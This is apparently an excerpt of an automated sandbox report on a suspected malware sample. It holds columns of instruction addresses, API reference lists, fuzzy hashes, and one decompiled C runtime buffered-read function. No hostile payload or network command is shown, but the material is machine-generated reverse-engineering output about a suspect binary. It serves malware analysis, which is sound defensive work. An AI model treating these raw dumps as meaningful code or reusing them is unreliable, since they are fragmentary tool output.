                                                                                                                                                                                                    0x004057e3
                                                                                                                                                                                                    0x004057e5
                                                                                                                                                                                                    0x004057ea
                                                                                                                                                                                                    0x00405921
                                                                                                                                                                                                    0x0040592a
                                                                                                                                                                                                    0x004057f0
                                                                                                                                                                                                    0x004057f3
                                                                                                                                                                                                    0x004057f6
                                                                                                                                                                                                    0x004057f9
                                                                                                                                                                                                    0x004057fc
                                                                                                                                                                                                    0x004057ff
                                                                                                                                                                                                    0x00405801
                                                                                                                                                                                                    0x00405804
                                                                                                                                                                                                    0x00405807
                                                                                                                                                                                                    0x0040580a
                                                                                                                                                                                                    0x0040580d
                                                                                                                                                                                                    0x00405810
                                                                                                                                                                                                    0x00405813
                                                                                                                                                                                                    0x00405816
                                                                                                                                                                                                    0x00405819
                                                                                                                                                                                                    0x0040581c
                                                                                                                                                                                                    0x00405824
                                                                                                                                                                                                    0x00405827
                                                                                                                                                                                                    0x0040582b
                                                                                                                                                                                                    0x0040582e
                                                                                                                                                                                                    0x00405831
                                                                                                                                                                                                    0x00405834
                                                                                                                                                                                                    0x00405837
                                                                                                                                                                                                    0x00405837
                                                                                                                                                                                                    0x00405839
                                                                                                                                                                                                    0x0040583a
                                                                                                                                                                                                    0x00405842
                                                                                                                                                                                                    0x00405847
                                                                                                                                                                                                    0x0040584a
                                                                                                                                                                                                    0x0040584f
                                                                                                                                                                                                    0x0040591c
                                                                                                                                                                                                    0x0040591c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405855
                                                                                                                                                                                                    0x00405855
                                                                                                                                                                                                    0x00405859
                                                                                                                                                                                                    0x0040585b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405870
                                                                                                                                                                                                    0x00405872
                                                                                                                                                                                                    0x00405874
                                                                                                                                                                                                    0x00405874
                                                                                                                                                                                                    0x00405877
                                                                                                                                                                                                    0x0040587b
                                                                                                                                                                                                    0x00405881
                                                                                                                                                                                                    0x00405881
                                                                                                                                                                                                    0x00405885
                                                                                                                                                                                                    0x00405889
                                                                                                                                                                                                    0x00405897
                                                                                                                                                                                                    0x00405899
                                                                                                                                                                                                    0x004058a5
                                                                                                                                                                                                    0x004058a7
                                                                                                                                                                                                    0x004058b3
                                                                                                                                                                                                    0x004058b5
                                                                                                                                                                                                    0x004058c1
                                                                                                                                                                                                    0x004058c5
                                                                                                                                                                                                    0x004058c7
                                                                                                                                                                                                    0x004058c7
                                                                                                                                                                                                    0x004058c8
                                                                                                                                                                                                    0x004058b7
                                                                                                                                                                                                    0x004058b7
                                                                                                                                                                                                    0x004058b7
                                                                                                                                                                                                    0x004058a9
                                                                                                                                                                                                    0x004058a9
                                                                                                                                                                                                    0x004058a9
                                                                                                                                                                                                    0x0040589b
                                                                                                                                                                                                    0x0040589b
                                                                                                                                                                                                    0x0040589b
                                                                                                                                                                                                    0x0040588f
                                                                                                                                                                                                    0x00405892
                                                                                                                                                                                                    0x00405892
                                                                                                                                                                                                    0x004058cc
                                                                                                                                                                                                    0x004058cf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004058d1
                                                                                                                                                                                                    0x004058d9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004058db
                                                                                                                                                                                                    0x004058db
                                                                                                                                                                                                    0x004058e0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004058e2
                                                                                                                                                                                                    0x004058e4
                                                                                                                                                                                                    0x00405930
                                                                                                                                                                                                    0x0040593f
                                                                                                                                                                                                    0x00405942
                                                                                                                                                                                                    0x00405944
                                                                                                                                                                                                    0x00405949
                                                                                                                                                                                                    0x0040594c
                                                                                                                                                                                                    0x0040594e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405950
                                                                                                                                                                                                    0x00405950
                                                                                                                                                                                                    0x00405953
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405953
                                                                                                                                                                                                    0x004058e6
                                                                                                                                                                                                    0x004058ea
                                                                                                                                                                                                    0x004058ec
                                                                                                                                                                                                    0x004058f1
                                                                                                                                                                                                    0x004058f2
                                                                                                                                                                                                    0x004058f4
                                                                                                                                                                                                    0x004058f6
                                                                                                                                                                                                    0x004058f8
                                                                                                                                                                                                    0x004058f9
                                                                                                                                                                                                    0x00405904
                                                                                                                                                                                                    0x00405906
                                                                                                                                                                                                    0x0040590b
                                                                                                                                                                                                    0x0040590e
                                                                                                                                                                                                    0x00405911
                                                                                                                                                                                                    0x00405916
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405955
                                                                                                                                                                                                    0x00405955
                                                                                                                                                                                                    0x00405955
                                                                                                                                                                                                    0x00405961
                                                                                                                                                                                                    0x00405963
                                                                                                                                                                                                    0x00405967
                                                                                                                                                                                                    0x0040596d
                                                                                                                                                                                                    0x0040596e
                                                                                                                                                                                                    0x0040597c
                                                                                                                                                                                                    0x0040597d
                                                                                                                                                                                                    0x00405970
                                                                                                                                                                                                    0x00405970
                                                                                                                                                                                                    0x00405974
                                                                                                                                                                                                    0x00405975
                                                                                                                                                                                                    0x00405975
                                                                                                                                                                                                    0x00405985
                                                                                                                                                                                                    0x00405988
                                                                                                                                                                                                    0x0040598a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040598c
                                                                                                                                                                                                    0x0040598c
                                                                                                                                                                                                    0x00405990
                                                                                                                                                                                                    0x004059a5
                                                                                                                                                                                                    0x004059ad
                                                                                                                                                                                                    0x004059b6
                                                                                                                                                                                                    0x004059b6
                                                                                                                                                                                                    0x004059b9
                                                                                                                                                                                                    0x004059c5
                                                                                                                                                                                                    0x00405992
                                                                                                                                                                                                    0x00405992
                                                                                                                                                                                                    0x004059a2
                                                                                                                                                                                                    0x004059a2
                                                                                                                                                                                                    0x00405990
                                                                                                                                                                                                    0x0040598a
                                                                                                                                                                                                    0x00405916
                                                                                                                                                                                                    0x004058e4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405860
                                                                                                                                                                                                    0x00405860
                                                                                                                                                                                                    0x00405862
                                                                                                                                                                                                    0x00405864
                                                                                                                                                                                                    0x00405865
                                                                                                                                                                                                    0x00405868
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040586a
                                                                                                                                                                                                    0x0040586a
                                                                                                                                                                                                    0x0040586d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00405868
                                                                                                                                                                                                    0x0040584f
                                                                                                                                                                                                    0x004057ea
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                      • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                      • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                      • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                    • String ID: 1.2.3
                                                                                                                                                                                                    • API String ID: 680241177-2310465506
                                                                                                                                                                                                    • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                    • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                    			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char* _v12;
                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				signed int _t90;
                                                                                                                                                                                                    				intOrPtr* _t92;
                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                    				char _t97;
                                                                                                                                                                                                    				signed int _t105;
                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                    				signed int _t107;
                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                    				signed int _t113;
                                                                                                                                                                                                    				intOrPtr* _t114;
                                                                                                                                                                                                    				signed int _t118;
                                                                                                                                                                                                    				signed int _t119;
                                                                                                                                                                                                    				signed int _t120;
                                                                                                                                                                                                    				char* _t121;
                                                                                                                                                                                                    				signed int _t125;
                                                                                                                                                                                                    				signed int _t131;
                                                                                                                                                                                                    				signed int _t133;
                                                                                                                                                                                                    				void* _t134;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t125 = __edx;
                                                                                                                                                                                                    				_t121 = _a4;
                                                                                                                                                                                                    				_t119 = _a8;
                                                                                                                                                                                                    				_t131 = 0;
                                                                                                                                                                                                    				_v12 = _t121;
                                                                                                                                                                                                    				_v8 = _t119;
                                                                                                                                                                                                    				if(_a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t138 = _t121;
                                                                                                                                                                                                    					if(_t121 != 0) {
                                                                                                                                                                                                    						_t133 = _a20;
                                                                                                                                                                                                    						__eflags = _t133;
                                                                                                                                                                                                    						if(_t133 == 0) {
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							__eflags = _t119 - 0xffffffff;
                                                                                                                                                                                                    							if(_t119 != 0xffffffff) {
                                                                                                                                                                                                    								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                                                                                                                                                    								_t134 = _t134 + 0xc;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t133 - _t131;
                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                    								goto L3;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t94 = _t90 | 0xffffffff;
                                                                                                                                                                                                    								_t125 = _t94 % _a12;
                                                                                                                                                                                                    								__eflags = _a16 - _t94 / _a12;
                                                                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                                                                    									goto L3;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L13:
                                                                                                                                                                                                    								_t131 = _a12 * _a16;
                                                                                                                                                                                                    								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                    								_v20 = _t131;
                                                                                                                                                                                                    								_t120 = _t131;
                                                                                                                                                                                                    								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                    									_v16 = 0x1000;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = _t131;
                                                                                                                                                                                                    								if(_t131 == 0) {
                                                                                                                                                                                                    									L40:
                                                                                                                                                                                                    									return _a16;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									do {
                                                                                                                                                                                                    										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                    										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                    											L24:
                                                                                                                                                                                                    											__eflags = _t120 - _v16;
                                                                                                                                                                                                    											if(_t120 < _v16) {
                                                                                                                                                                                                    												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                                                                                                                                                    												__eflags = _t97 - 0xffffffff;
                                                                                                                                                                                                    												if(_t97 == 0xffffffff) {
                                                                                                                                                                                                    													L48:
                                                                                                                                                                                                    													return (_t131 - _t120) / _a12;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												__eflags = _v8;
                                                                                                                                                                                                    												if(_v8 == 0) {
                                                                                                                                                                                                    													L44:
                                                                                                                                                                                                    													__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                    													if(__eflags != 0) {
                                                                                                                                                                                                    														E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                    														_t134 = _t134 + 0xc;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                    													L4:
                                                                                                                                                                                                    													E0040E744(_t125, _t131, _t133);
                                                                                                                                                                                                    													goto L5;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t123 = _v12;
                                                                                                                                                                                                    												_v12 = _v12 + 1;
                                                                                                                                                                                                    												 *_v12 = _t97;
                                                                                                                                                                                                    												_t120 = _t120 - 1;
                                                                                                                                                                                                    												_t70 =  &_v8;
                                                                                                                                                                                                    												 *_t70 = _v8 - 1;
                                                                                                                                                                                                    												__eflags =  *_t70;
                                                                                                                                                                                                    												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                    												goto L39;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _v16;
                                                                                                                                                                                                    											if(_v16 == 0) {
                                                                                                                                                                                                    												_t105 = 0x7fffffff;
                                                                                                                                                                                                    												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                    												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                    													_t105 = _t120;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                    												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                    													_t55 = _t120 % _v16;
                                                                                                                                                                                                    													__eflags = _t55;
                                                                                                                                                                                                    													_t125 = _t55;
                                                                                                                                                                                                    													_t110 = _t120;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t125 = 0x7fffffff % _v16;
                                                                                                                                                                                                    													_t110 = 0x7fffffff;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t105 = _t110 - _t125;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t105 - _v8;
                                                                                                                                                                                                    											if(_t105 > _v8) {
                                                                                                                                                                                                    												goto L44;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_push(_t105);
                                                                                                                                                                                                    												_push(_v12);
                                                                                                                                                                                                    												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                                                                                                                                                    												_pop(_t123);
                                                                                                                                                                                                    												_push(_t106);
                                                                                                                                                                                                    												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                                                                                                    												_t134 = _t134 + 0xc;
                                                                                                                                                                                                    												__eflags = _t107;
                                                                                                                                                                                                    												if(_t107 == 0) {
                                                                                                                                                                                                    													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                                                                                                    													goto L48;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												__eflags = _t107 - 0xffffffff;
                                                                                                                                                                                                    												if(_t107 == 0xffffffff) {
                                                                                                                                                                                                    													L47:
                                                                                                                                                                                                    													_t80 = _t133 + 0xc;
                                                                                                                                                                                                    													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                                                                                                    													__eflags =  *_t80;
                                                                                                                                                                                                    													goto L48;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_v12 = _v12 + _t107;
                                                                                                                                                                                                    												_t120 = _t120 - _t107;
                                                                                                                                                                                                    												_v8 = _v8 - _t107;
                                                                                                                                                                                                    												goto L39;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t113 =  *(_t133 + 4);
                                                                                                                                                                                                    										__eflags = _t113;
                                                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                                                    											goto L24;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										if(__eflags < 0) {
                                                                                                                                                                                                    											goto L47;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t131 = _t120;
                                                                                                                                                                                                    										__eflags = _t120 - _t113;
                                                                                                                                                                                                    										if(_t120 >= _t113) {
                                                                                                                                                                                                    											_t131 = _t113;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t131 - _v8;
                                                                                                                                                                                                    										if(_t131 > _v8) {
                                                                                                                                                                                                    											_t133 = 0;
                                                                                                                                                                                                    											__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                    												E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                    												_t134 = _t134 + 0xc;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t114 = E0040BFC1(__eflags);
                                                                                                                                                                                                    											_push(_t133);
                                                                                                                                                                                                    											_push(_t133);
                                                                                                                                                                                                    											_push(_t133);
                                                                                                                                                                                                    											_push(_t133);
                                                                                                                                                                                                    											 *_t114 = 0x22;
                                                                                                                                                                                                    											_push(_t133);
                                                                                                                                                                                                    											goto L4;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                                                                                                                    											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                                                                                                    											 *_t133 =  *_t133 + _t131;
                                                                                                                                                                                                    											_v12 = _v12 + _t131;
                                                                                                                                                                                                    											_t120 = _t120 - _t131;
                                                                                                                                                                                                    											_t134 = _t134 + 0x10;
                                                                                                                                                                                                    											_v8 = _v8 - _t131;
                                                                                                                                                                                                    											_t131 = _v20;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										L39:
                                                                                                                                                                                                    										__eflags = _t120;
                                                                                                                                                                                                    									} while (_t120 != 0);
                                                                                                                                                                                                    									goto L40;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t118 = _t90 | 0xffffffff;
                                                                                                                                                                                                    						_t90 = _t118 / _a12;
                                                                                                                                                                                                    						_t125 = _t118 % _a12;
                                                                                                                                                                                                    						__eflags = _a16 - _t90;
                                                                                                                                                                                                    						if(_a16 <= _t90) {
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t92 = E0040BFC1(_t138);
                                                                                                                                                                                                    					_push(_t131);
                                                                                                                                                                                                    					_push(_t131);
                                                                                                                                                                                                    					_push(_t131);
                                                                                                                                                                                                    					_push(_t131);
                                                                                                                                                                                                    					 *_t92 = 0x16;
                                                                                                                                                                                                    					_push(_t131);
                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





























                                                                                                                                                                                                    0x0040bcc2
                                                                                                                                                                                                    0x0040bcca
                                                                                                                                                                                                    0x0040bcce
                                                                                                                                                                                                    0x0040bcd3
                                                                                                                                                                                                    0x0040bcd5
                                                                                                                                                                                                    0x0040bcd8
                                                                                                                                                                                                    0x0040bcde
                                                                                                                                                                                                    0x0040bd01
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bce5
                                                                                                                                                                                                    0x0040bce5
                                                                                                                                                                                                    0x0040bce7
                                                                                                                                                                                                    0x0040bd08
                                                                                                                                                                                                    0x0040bd0b
                                                                                                                                                                                                    0x0040bd0d
                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                    0x0040bd1f
                                                                                                                                                                                                    0x0040bd24
                                                                                                                                                                                                    0x0040bd29
                                                                                                                                                                                                    0x0040bd29
                                                                                                                                                                                                    0x0040bd2c
                                                                                                                                                                                                    0x0040bd2e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bd30
                                                                                                                                                                                                    0x0040bd30
                                                                                                                                                                                                    0x0040bd35
                                                                                                                                                                                                    0x0040bd38
                                                                                                                                                                                                    0x0040bd3b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bd3d
                                                                                                                                                                                                    0x0040bd40
                                                                                                                                                                                                    0x0040bd44
                                                                                                                                                                                                    0x0040bd4b
                                                                                                                                                                                                    0x0040bd4e
                                                                                                                                                                                                    0x0040bd50
                                                                                                                                                                                                    0x0040bd5a
                                                                                                                                                                                                    0x0040bd52
                                                                                                                                                                                                    0x0040bd55
                                                                                                                                                                                                    0x0040bd55
                                                                                                                                                                                                    0x0040bd61
                                                                                                                                                                                                    0x0040bd63
                                                                                                                                                                                                    0x0040be53
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bd69
                                                                                                                                                                                                    0x0040bd69
                                                                                                                                                                                                    0x0040bd69
                                                                                                                                                                                                    0x0040bd70
                                                                                                                                                                                                    0x0040bdb6
                                                                                                                                                                                                    0x0040bdb6
                                                                                                                                                                                                    0x0040bdb9
                                                                                                                                                                                                    0x0040be24
                                                                                                                                                                                                    0x0040be2a
                                                                                                                                                                                                    0x0040be2d
                                                                                                                                                                                                    0x0040beb8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bebe
                                                                                                                                                                                                    0x0040be33
                                                                                                                                                                                                    0x0040be37
                                                                                                                                                                                                    0x0040be87
                                                                                                                                                                                                    0x0040be87
                                                                                                                                                                                                    0x0040be8b
                                                                                                                                                                                                    0x0040be95
                                                                                                                                                                                                    0x0040be9a
                                                                                                                                                                                                    0x0040be9a
                                                                                                                                                                                                    0x0040bea2
                                                                                                                                                                                                    0x0040beaa
                                                                                                                                                                                                    0x0040beab
                                                                                                                                                                                                    0x0040beac
                                                                                                                                                                                                    0x0040bead
                                                                                                                                                                                                    0x0040beae
                                                                                                                                                                                                    0x0040bcf9
                                                                                                                                                                                                    0x0040bcf9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bcfe
                                                                                                                                                                                                    0x0040be39
                                                                                                                                                                                                    0x0040be3c
                                                                                                                                                                                                    0x0040be3f
                                                                                                                                                                                                    0x0040be44
                                                                                                                                                                                                    0x0040be45
                                                                                                                                                                                                    0x0040be45
                                                                                                                                                                                                    0x0040be45
                                                                                                                                                                                                    0x0040be48
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040be48
                                                                                                                                                                                                    0x0040bdbb
                                                                                                                                                                                                    0x0040bdbf
                                                                                                                                                                                                    0x0040bde0
                                                                                                                                                                                                    0x0040bde5
                                                                                                                                                                                                    0x0040bde7
                                                                                                                                                                                                    0x0040bde9
                                                                                                                                                                                                    0x0040bde9
                                                                                                                                                                                                    0x0040bdc1
                                                                                                                                                                                                    0x0040bdc8
                                                                                                                                                                                                    0x0040bdca
                                                                                                                                                                                                    0x0040bdd7
                                                                                                                                                                                                    0x0040bdd7
                                                                                                                                                                                                    0x0040bdd7
                                                                                                                                                                                                    0x0040bdda
                                                                                                                                                                                                    0x0040bdcc
                                                                                                                                                                                                    0x0040bdce
                                                                                                                                                                                                    0x0040bdd1
                                                                                                                                                                                                    0x0040bdd1
                                                                                                                                                                                                    0x0040bddc
                                                                                                                                                                                                    0x0040bddc
                                                                                                                                                                                                    0x0040bdeb
                                                                                                                                                                                                    0x0040bdee
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bdf4
                                                                                                                                                                                                    0x0040bdf4
                                                                                                                                                                                                    0x0040bdf5
                                                                                                                                                                                                    0x0040bdf9
                                                                                                                                                                                                    0x0040bdfe
                                                                                                                                                                                                    0x0040bdff
                                                                                                                                                                                                    0x0040be00
                                                                                                                                                                                                    0x0040be05
                                                                                                                                                                                                    0x0040be08
                                                                                                                                                                                                    0x0040be0a
                                                                                                                                                                                                    0x0040bec6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bec6
                                                                                                                                                                                                    0x0040be10
                                                                                                                                                                                                    0x0040be13
                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                    0x0040be19
                                                                                                                                                                                                    0x0040be1c
                                                                                                                                                                                                    0x0040be1e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040be1e
                                                                                                                                                                                                    0x0040bdee
                                                                                                                                                                                                    0x0040bd72
                                                                                                                                                                                                    0x0040bd75
                                                                                                                                                                                                    0x0040bd77
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bd79
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bd7f
                                                                                                                                                                                                    0x0040bd81
                                                                                                                                                                                                    0x0040bd83
                                                                                                                                                                                                    0x0040bd85
                                                                                                                                                                                                    0x0040bd85
                                                                                                                                                                                                    0x0040bd87
                                                                                                                                                                                                    0x0040bd8a
                                                                                                                                                                                                    0x0040be5b
                                                                                                                                                                                                    0x0040be5d
                                                                                                                                                                                                    0x0040be61
                                                                                                                                                                                                    0x0040be6a
                                                                                                                                                                                                    0x0040be6f
                                                                                                                                                                                                    0x0040be6f
                                                                                                                                                                                                    0x0040be72
                                                                                                                                                                                                    0x0040be77
                                                                                                                                                                                                    0x0040be78
                                                                                                                                                                                                    0x0040be79
                                                                                                                                                                                                    0x0040be7a
                                                                                                                                                                                                    0x0040be7b
                                                                                                                                                                                                    0x0040be81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bd90
                                                                                                                                                                                                    0x0040bd99
                                                                                                                                                                                                    0x0040bd9e
                                                                                                                                                                                                    0x0040bda1
                                                                                                                                                                                                    0x0040bda3
                                                                                                                                                                                                    0x0040bda6
                                                                                                                                                                                                    0x0040bda8
                                                                                                                                                                                                    0x0040bdab
                                                                                                                                                                                                    0x0040bdae
                                                                                                                                                                                                    0x0040bdae
                                                                                                                                                                                                    0x0040be4b
                                                                                                                                                                                                    0x0040be4b
                                                                                                                                                                                                    0x0040be4b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bd69
                                                                                                                                                                                                    0x0040bd63
                                                                                                                                                                                                    0x0040bd2e
                                                                                                                                                                                                    0x0040bd0f
                                                                                                                                                                                                    0x0040bd14
                                                                                                                                                                                                    0x0040bd14
                                                                                                                                                                                                    0x0040bd17
                                                                                                                                                                                                    0x0040bd1a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bd1a
                                                                                                                                                                                                    0x0040bce9
                                                                                                                                                                                                    0x0040bce9
                                                                                                                                                                                                    0x0040bcee
                                                                                                                                                                                                    0x0040bcef
                                                                                                                                                                                                    0x0040bcf0
                                                                                                                                                                                                    0x0040bcf1
                                                                                                                                                                                                    0x0040bcf2
                                                                                                                                                                                                    0x0040bcf8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040bcf8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                    • String ID:
